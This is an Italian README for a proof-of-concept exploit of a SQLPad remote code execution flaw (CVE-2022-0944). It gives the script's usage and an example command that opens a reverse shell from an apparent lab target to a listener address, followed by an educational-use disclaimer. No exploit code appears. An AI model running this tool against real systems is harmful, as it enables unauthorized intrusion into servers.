
Exploit proof-of-concept per SQLPad RCE (CVE-2022-0944) che attiva una reverse shell verso la macchina dell'attaccante, destinato a test di sicurezza autorizzati e istruzione.
Proof of concept di exploit per SQLPad RCE (CVE-2022-0944) che porta a una RCE con una reverse shell sul PC dell'attaccante.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
Esempio:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Questo repository contiene strumenti destinati esclusivamente a scopi educativi, specificamente per l'uso in ambienti di apprendimento sulla cybersecurity. L'autore di questo codice non si assume alcuna responsabilità per qualsiasi conseguenza derivante dall'uso, dall'abuso o dalla modifica di questo codice. Il codice è fornito "così com'è" senza alcuna garanzia, esplicita o implicita, incluse ma non limitate alle garanzie implicite di commerciabilità o idoneità per uno scopo particolare.